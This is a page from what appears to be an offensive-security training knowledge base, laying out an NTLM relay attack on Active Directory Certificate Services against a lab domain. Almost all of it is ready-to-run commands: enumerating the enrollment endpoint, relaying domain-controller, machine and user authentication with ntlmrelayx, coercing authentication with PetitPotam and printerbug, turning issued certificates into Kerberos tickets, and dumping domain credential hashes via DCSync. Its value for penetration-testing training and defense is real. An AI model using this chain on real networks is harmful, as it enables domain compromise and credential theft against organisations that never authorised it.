Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks / Techniques

NTLM to ADCS

NTLM relay to ADCS abuses web enrollment endpoints. We relay a user or machine authentication to /certsrv/, request a certificate for the relayed principal, then authenticate with the issued PFX.

Find ADCS web enrollment

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -enabled -stdout
curl -I http://ca.ootw.local/certsrv/

Relay DC machine account to ADCS

ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support

Relay workstation machine account to ADCS

ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template Machine -smb2support

Relay user to ADCS

ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template User -smb2support

Trigger DC authentication

PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200
printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100

Use issued machine certificate with PKINIT

gettgtpkinit.py -cert-pfx 'DC01$.pfx' -dc-ip 10.10.10.200 'ootw.local/dc01$' dc01.ccache
export KRB5CCNAME=dc01.ccache
klist

DCSync with DC machine ticket

secretsdump.py -k -no-pass 'ootw.local/dc01$@dc01.ootw.local' -dc-ip 10.10.10.200 -just-dc

Use issued user certificate with Certipy

certipy auth -pfx student.pfx -domain ootw.local -dc-ip 10.10.10.200

Notes

The template must match the relayed principal. Domain controllers usually need DomainController or an equivalent machine-authentication template. Users need a user-authentication template.

If Extended Protection for Authentication is enforced correctly on the web enrollment endpoint, this path should fail.